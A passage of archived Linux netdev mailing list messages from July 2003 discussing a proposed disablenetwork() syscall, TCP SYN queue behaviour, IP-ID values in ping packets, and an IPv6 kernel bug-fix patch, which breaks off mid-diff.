-0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Jl32x006478 for ; Mon, 7 Jul 2003 12:47:05 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id EE0936652; Mon, 7 Jul 2003 15:46:57 -0400 (EDT) Date: Mon, 7 Jul 2003 15:46:57 -0400 From: Jeff Garzik To: Pekka Savola Cc: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? Message-ID: <20030707194657.GA11328@gtf.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i X-archive-position: 3809 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Mon, Jul 07, 2003 at 10:40:02PM +0300, Pekka Savola wrote: > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > has been brought up in the past. I'm not sure whether it's feasible or > not, but at least it (and other methods to limit the functions of a > user-level code) might bear consideration. What about some URLs to what you are describing? The most information you provided was in $subject, whose content makes me a bit leery... Jeff From pekkas@netcore.fi Mon Jul 7 12:52:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 12:52:32 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67JqP2x006946 for ; Mon, 7 Jul 2003 12:52:26 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h67JqFR16467; Mon, 7 Jul 2003 22:52:15 +0300 Date: Mon, 7 Jul 2003 22:52:15 +0300 (EEST) From: Pekka Savola To: Jeff Garzik cc: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? In-Reply-To: <20030707194657.GA11328@gtf.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3810 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Mon, 7 Jul 2003, Jeff Garzik wrote: > On Mon, Jul 07, 2003 at 10:40:02PM +0300, Pekka Savola wrote: > > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > > has been brought up in the past. I'm not sure whether it's feasible or > > not, but at least it (and other methods to limit the functions of a > > user-level code) might bear consideration. > > What about some URLs to what you are describing? > > The most information you provided was in $subject, whose content > makes me a bit leery... Well, apart from the post scriptum, there was very little content about the feature/idea :-), and the details would seem to be up for everyone's imagination. FWIW, the body of the message is below: ===== Richard M. Smith writes: [ mail readers disabling inline images ] > It will be interesting to see how email marketing companies and > spammers adapt to these technical changes in HTML email. ASCII porn, perhaps? Especially if the sender can control the color, and size, of text. I suppose those will be the next casualties in the war on spam. It's quite depressing that this is what people think of as ``security'': patch maniacally; install a scanner that checks for yesterday's attacks; don't view the pictures, don't drink the water, don't breathe the air. I've been playing with a radically different system design (I'm thinking of calling it ``UNIX'') where conceptually separate tasks are split into separate processes. If you want to gunzip a stream of data, for example, you run a gunzip program in its own chroot jail, under its own uid, with no way to read any interesting data except through a predefined IPC hook (I'm thinking of calling that a ``pipe'' on ``standard input'') and with no way to touch anything except through another predefined IPC hook. The only thing that an attacker can do by taking over this gunzip program is generate arbitrary output data, which he could have done anyway. Typical picture-generating programs can be isolated in the same way. ==== -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mitch@sfgoth.com Mon Jul 7 13:57:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 13:58:03 -0700 (PDT) Received: from gaz.sfgoth.com ([63.205.85.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Kvt2x007783 for ; Mon, 7 Jul 2003 13:57:56 -0700 Received: from gaz.sfgoth.com (localhost.sfgoth.com [127.0.0.1]) by gaz.sfgoth.com (8.12.6p2/8.12.6) with ESMTP id h67L3Alx022365; Mon, 7 Jul 2003 14:03:10 -0700 (PDT) (envelope-from mitch@gaz.sfgoth.com) Received: (from mitch@localhost) by gaz.sfgoth.com (8.12.6p2/8.12.6/Submit) id h67L3Amn022364; Mon, 7 Jul 2003 14:03:10 -0700 (PDT) (envelope-from mitch) Date: Mon, 7 Jul 2003 14:03:10 -0700 From: Mitchell Blank Jr To: Pekka Savola Cc: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? Message-ID: <20030707210310.GA21759@gaz.sfgoth.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4.1i X-archive-position: 3811 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mitch@sfgoth.com Precedence: bulk X-list: netdev Pekka Savola wrote: > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > has been brought up in the past. I'm not sure whether it's feasible or > not, but at least it (and other methods to limit the functions of a > user-level code) might bear consideration. It sounds like something that could be a implemented as a capability (CAP_NET_ACCESS or such) -Mitch From palbrecht@qwest.net Mon Jul 7 14:34:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 14:34:19 -0700 (PDT) Received: from mpls-qmqp-03.inet.qwest.net (mpls-qmqp-03.inet.qwest.net [63.231.195.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67LY62x008454 for ; Mon, 7 Jul 2003 14:34:07 -0700 Received: (qmail 21795 invoked by uid 0); 7 Jul 2003 21:26:47 -0000 Received: from mpls-pop-07.inet.qwest.net (63.231.195.7) by mpls-qmqp-03.inet.qwest.net with QMQP; 7 Jul 2003 21:26:47 -0000 Received: from 0-1pool152-236.nas9.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.152.236) by mpls-pop-07.inet.qwest.net with SMTP; 7 Jul 2003 21:34:05 -0000 Date: Mon, 7 Jul 2003 16:30:47 -0700 Message-ID: <001401c344df$ccbc63c0$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Nivedita Singhvi" Cc: linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> <3F08B7E2.7040208@us.ibm.com> <000d01c3444f$e6439600$6801a8c0@oemcomputer> <3F090A4F.10004@us.ibm.com> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3812 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev Nivedita Singhvi writes: > > Again, youre limiting the number of connnection requests > that are allowed to wait in the *accept* queue, where > we move to once we're ESTABLISHED. You arent limiting > a request sitting in the SYN queue. > This statement is inconsistent with the description of this scenario in Steven's TCP/IP Illustrated. Specifically, continuing the handshake in the TCP layer, i.e., sending a syn/ack and moving to the syn_recd state, is incorrect if the limit of the server's socket backlog would be exceeded. How do you account for this discrepancy between linux and other berkeley-derived implementations? From ak@suse.de Mon Jul 7 14:48:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 14:48:25 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67LmH2x008869 for ; Mon, 7 Jul 2003 14:48:20 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id E33DF15089; Mon, 7 Jul 2003 23:48:11 +0200 (MEST) X-Authentication-Warning: oldwotan.suse.de: ak set sender to ak@suse.de using -f To: "Paul Albrecht" Cc: niv@us.ibm.com, linux-kernel@vger.kernel.org, "netdev" Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> From: Andi Kleen Date: 07 Jul 2003 23:48:10 +0200 In-Reply-To: <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> Message-ID: Lines: 14 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3813 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev "Paul Albrecht" writes: > This statement is inconsistent with the description of this scenario in > Steven's TCP/IP Illustrated. Specifically, continuing the handshake in the > TCP layer, i.e., sending a syn/ack and moving to the syn_recd state, is > incorrect if the limit of the server's socket backlog would be exceeded. > How do you account for this discrepancy between linux and other > berkeley-derived implementations? The 4.4BSD-Lite code described in Stevens is long outdated. All modern BSDs (and probably most other Unixes too) do it in a similar way to what Nivedita described. The keywords are "syn flood attack" and "DoS". -Andi From doug@wireboard.com Mon Jul 7 15:25:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 15:25:38 -0700 (PDT) Received: from varsoon.wireboard.com (www.wireboard.com [216.151.155.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67MPQ2x009417 for ; Mon, 7 Jul 2003 15:25:27 -0700 Received: from doug by varsoon.wireboard.com with local (Exim 3.35 #1) id 19ZeQ9-0002nB-00; Mon, 07 Jul 2003 18:25:17 -0400 To: Andi Kleen Cc: "Paul Albrecht" , niv@us.ibm.com, linux-kernel@vger.kernel.org, "netdev" Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> From: Doug McNaught Date: 07 Jul 2003 18:25:17 -0400 In-Reply-To: Andi Kleen's message of "07 Jul 2003 23:48:10 +0200" Message-ID: Lines: 19 User-Agent: Gnus/5.0806 (Gnus v5.8.6) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3814 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: doug@mcnaught.org Precedence: bulk X-list: netdev Andi Kleen writes: > "Paul Albrecht" writes: > > > This statement is inconsistent with the description of this scenario in > > Steven's TCP/IP Illustrated. Specifically, continuing the handshake in the > > TCP layer, i.e., sending a syn/ack and moving to the syn_recd state, is > > incorrect if the limit of the server's socket backlog would be exceeded. > > How do you account for this discrepancy between linux and other > > berkeley-derived implementations? > > The 4.4BSD-Lite code described in Stevens is long outdated. All modern > BSDs (and probably most other Unixes too) do it in a similar way to what > Nivedita described. The keywords are "syn flood attack" and "DoS". And furthermore, IIRC, the current Linux networking code is not Berkeley-derived, though an earlier version was. -Doug From acme@conectiva.com.br Mon Jul 7 16:01:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 16:01:11 -0700 (PDT) Received: from orion.netbank.com.br (orion.netbank.com.br [200.203.199.90]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67N152x009965 for ; Mon, 7 Jul 2003 16:01:06 -0700 Received: from [200.181.170.115] (helo=brinquendo.conectiva.com.br) by orion.netbank.com.br with asmtp (Exim 3.33 #1) id 19Zf1Z-00012Q-00; Mon, 07 Jul 2003 20:03:57 -0300 Received: by brinquendo.conectiva.com.br (Postfix, from userid 500) id 36CBC1966C; Mon, 7 Jul 2003 22:33:35 +0000 (UTC) Date: Mon, 7 Jul 2003 19:33:35 -0300 From: Arnaldo Carvalho de Melo To: Pekka Savola Cc: Jeff Garzik , netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? Message-ID: <20030707223334.GG5292@conectiva.com.br> References: <20030707194657.GA11328@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Url: http://advogato.org/person/acme Organization: Conectiva S.A. User-Agent: Mutt/1.5.4i X-archive-position: 3815 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: acme@conectiva.com.br Precedence: bulk X-list: netdev Em Mon, Jul 07, 2003 at 10:52:15PM +0300, Pekka Savola escreveu: > On Mon, 7 Jul 2003, Jeff Garzik wrote: > > On Mon, Jul 07, 2003 at 10:40:02PM +0300, Pekka Savola wrote: > > > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > > > has been brought up in the past. I'm not sure whether it's feasible or > > > not, but at least it (and other methods to limit the functions of a > > > user-level code) might bear consideration. > > > > What about some URLs to what you are describing? > > > > The most information you provided was in $subject, whose content > > makes me a bit leery... > > Well, apart from the post scriptum, there was very little content about > the feature/idea :-), and the details would seem to be up for everyone's > imagination. > > FWIW, the body of the message is below: Incomplete, here is the part that he mention the disablenetwork syscall: ------------------------------------- 8< ------------------------------ P.S. It's hard for a portable chroot tool to cut off a program's network access. Kernel designers should provide a disablenetwork() syscall, with the disabling inherited by children. Other kernel changes would be nice, but disablenetwork() is the only critical change. ------------------------------------- 8< ------------------------------ From ak@suse.de Mon Jul 7 16:52:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 16:52:19 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Nq82x010571 for ; Mon, 7 Jul 2003 16:52:09 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 80B8A144E5; Tue, 8 Jul 2003 01:52:03 +0200 (MEST) Date: Tue, 8 Jul 2003 01:52:01 +0200 From: Andi Kleen To: Doug McNaught Cc: palbrecht@qwest.net, niv@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: question about linux tcp request queue handling Message-Id: <20030708015201.4a5ad7e6.ak@suse.de> In-Reply-To: References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3816 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On 07 Jul 2003 18:25:17 -0400 Doug McNaught wrote: > And furthermore, IIRC, the current Linux networking code is not > Berkeley-derived, though an earlier version was. The linux network stack was never BSD derived in any way. [there are two header files that came from net2, but they do not contain any code] -Andi From jmorris@intercode.com.au Mon Jul 7 16:59:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 16:59:50 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:0SE68HI0BZK1XMeIREV1bZehjFUCwaYg@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Nxh2x010902 for ; Mon, 7 Jul 2003 16:59:44 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h67NxWr15959; Tue, 8 Jul 2003 09:59:33 +1000 Date: Tue, 8 Jul 2003 09:59:32 +1000 (EST) From: James Morris To: Pekka Savola cc: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3817 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Mon, 7 Jul 2003, Pekka Savola wrote: > Hi, > > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > has been brought up in the past. Such a feature already exists in SELinux. > I'm not sure whether it's feasible or > not, but at least it (and other methods to limit the functions of a > user-level code) might bear consideration. This is precisely what LSM is for, so new security models can be implemented without any direct effect on the core kernel. - James -- James Morris From doug@wireboard.com Mon Jul 7 17:18:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 17:18:14 -0700 (PDT) Received: from varsoon.wireboard.com (www.wireboard.com [216.151.155.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h680I32x011336 for ; Mon, 7 Jul 2003 17:18:04 -0700 Received: from doug by varsoon.wireboard.com with local (Exim 3.35 #1) id 19ZgBB-00031R-00; Mon, 07 Jul 2003 20:17:57 -0400 To: Andi Kleen Cc: palbrecht@qwest.net, niv@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <20030708015201.4a5ad7e6.ak@suse.de> From: Doug McNaught Date: 07 Jul 2003 20:17:57 -0400 In-Reply-To: Andi Kleen's message of "Tue, 8 Jul 2003 01:52:01 +0200" Message-ID: Lines: 20 User-Agent: Gnus/5.0806 (Gnus v5.8.6) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3818 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: doug@mcnaught.org Precedence: bulk X-list: netdev Andi Kleen writes: > On 07 Jul 2003 18:25:17 -0400 > Doug McNaught wrote: > > > And furthermore, IIRC, the current Linux networking code is not > > Berkeley-derived, though an earlier version was. > > The linux network stack was never BSD derived in any way. > > [there are two header files that came from net2, but they do not > contain any code] OIDNRC, thanks for the correction. :) Although, I distinctly remember seeing "Net-2" in one of the boot mesages in an early kernel (pre 1.0); was that just the header files' doing? -Doug From ak@suse.de Mon Jul 7 17:25:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 17:25:19 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h680PE2x011664 for ; Mon, 7 Jul 2003 17:25:14 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id B289E14E0A; Tue, 8 Jul 2003 02:25:08 +0200 (MEST) Date: Tue, 8 Jul 2003 02:25:07 +0200 From: Andi Kleen To: Doug McNaught Cc: palbrecht@qwest.net, niv@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: question about linux tcp request queue handling Message-Id: <20030708022507.0c9f439b.ak@suse.de> In-Reply-To: References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <20030708015201.4a5ad7e6.ak@suse.de> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3819 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On 07 Jul 2003 20:17:57 -0400 Doug McNaught wrote: > Although, I distinctly remember seeing "Net-2" in one of the boot > mesages in an early kernel (pre 1.0); was that just the header files' > doing? Net-2 was the name for a linux network code release too. The current code is net4 (actually more net5). But it has nothing to do with the similarly named BSD release. -Andi From kohei@cysols.com Mon Jul 7 18:58:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 18:59:06 -0700 (PDT) Received: from geto.cysol.co.jp (geto.cysol.co.jp [210.233.3.227]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h681wu2x013338 for ; Mon, 7 Jul 2003 18:58:57 -0700 Received: from cysols.com (agari2.priv.cysol.co.jp [192.168.0.249]) by geto.cysol.co.jp (8.12.9/3.7W) with ESMTP id h681wlwQ011322; Tue, 8 Jul 2003 10:58:48 +0900 (JST) Message-ID: <3F0A2564.6030003@cysols.com> Date: Tue, 08 Jul 2003 10:59:00 +0900 From: Kohei OHTA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: ja MIME-Version: 1.0 To: Ulisses CC: netdev@oss.sgi.com Subject: Re: IP-ID field of ICMP echo request References: <3F095B7B.5090203@cysols.com> <1057603237.1001.18.camel@ryback> In-Reply-To: <1057603237.1001.18.camel@ryback> X-Enigmail-Version: 0.76.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3820 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kohei@cysols.com Precedence: bulk X-list: netdev Ulisses, Thanks for your helpful information. I understood the reason. The article pointed by you says "Linux 2.4 also uses peer-specific IPID values (see net/ipv4/inetpeer.c)." That is great. Kohei. >>I found a strange packet, which is generated by ping of Linux. >>It is observed ID field of IP header in ping packet (Echo request) is always 0. >> >>I confirmed this on kernel 2.4.18 and 2.4.21. >>My colleague also confirmed this is fixed in kernel 2.5.74. >> >>I hope this is fixed in next next 2.4.x release. > > Hi, Kohei, > > I guess this behaviour is to prevent Idle scanning, that is based on > predictable IPID numbers [1]. Therefore, the Linux TCP/IP stack uses 0 > as IPID when the DF (Don't Fragment) bit is set. I'm not sure, but I > think that Linux also uses peer-specific IPID numbers to make the > prediction harder. > > -- Ulisses > > [1] http://www.insecure.org/nmap/idlescan.html > > > From palbrecht@qwest.net Mon Jul 7 19:18:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 19:18:24 -0700 (PDT) Received: from mpls-qmqp-02.inet.qwest.net (mpls-qmqp-02.inet.qwest.net [63.231.195.113]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h682I82x013852 for ; Mon, 7 Jul 2003 19:18:09 -0700 Received: (qmail 75219 invoked by uid 0); 8 Jul 2003 01:45:28 -0000 Received: from mpls-pop-14.inet.qwest.net (63.231.195.14) by mpls-qmqp-02.inet.qwest.net with QMQP; 8 Jul 2003 01:45:28 -0000 Received: from 0-2pool145-162.nas8.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.145.162) by mpls-pop-14.inet.qwest.net with SMTP; 8 Jul 2003 02:18:06 -0000 Date: Mon, 7 Jul 2003 21:14:48 -0700 Message-ID: <001501c34507$7a19baa0$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Andi Kleen" Cc: niv@us.ibm.com, linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel><001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel><3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel><000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel><3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel><001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3821 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev Andi Kleen writes: > > The 4.4BSD-Lite code described in Stevens is long outdated. > I was referring to volume one subtitled: "The Protocols." It doesn't describe implementation and the examples are not limited to bsd-lite. > >All modern BSDs (and probably most other Unixes too) do it in a similar way to what > Nivedita described. > Linux doesn't operate in the manner Nivedita describes ... the tcp layer on the server side moves to the syn_recd state, but doesn't accept the ack back from client. Instead it times out and sends its syn/ack back to the client and again ignores the client's ack, ... Eventually, either there's room on backlog queue and the server side moves to the established state or the server side stops resending the its syn/ack. This doesn't seem to make much sense. If the tcp layer can send the syn/ack it seems like it should probably respond to the client's ack. > >The keywords are "syn flood attack" and "DoS". > I'd be interested in a more specific reference detailing the changes required to the listen syscall as a consequence of the changes required for avoidance of syn flood attacks. Thanks. From yoshfuji@linux-ipv6.org Tue Jul 8 06:17:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 06:17:25 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68DHD2x027872 for ; Tue, 8 Jul 2003 06:17:15 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h68DIYBo016349; Tue, 8 Jul 2003 22:18:35 +0900 Date: Tue, 08 Jul 2003 22:18:34 +0900 (JST) Message-Id: <20030708.221834.127574909.yoshfuji@linux-ipv6.org> To: davem@redhat.com, jmorris@intercode.com.au CC: netdev@oss.sgi.com, Thomas Graf , yoshfuji@linux-ipv6.org Subject: [PATCH] IPV6: Fix BUG when appending destination options headers From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3822 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. This patch fixes BUG when pushing IPv6 destination options over an IPv6 raw socket. Patch is based on one from Thomas Graf . Index: linux-2.5/net/ipv6/ip6_output.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv6/ip6_output.c,v retrieving revision 1.32 diff -u -r1.32 ip6_output.c --- linux-2.5/net/ipv6/ip6_output.c 1 Jul 2003 00:57:19 -0000 1.32 +++ linux-2.5/net/ipv6/ip6_output.c 8 Jul 2003 11:55:33 -0000 @@ -1239,7 +1239,6 @@ memcpy(np->cork.opt, opt, opt->tot_len); inet->cork.flags |= IPCORK_OPT; /* need source address above miyazawa*/ - exthdrlen += opt->opt_flen ? opt->opt_flen : 0; } dst_hold(&rt->u.dst); np->cork.rt = rt; @@ -1252,6 +1251,7 @@ length += exthdrlen; transhdrlen += exthdrlen; } + exthdrlen += opt ? opt->opt_flen : 0; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) Index: linux-2.5/net/ipv6/raw.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv6/raw.c,v retrieving revision 1.32 diff -u -r1.32 raw.c --- 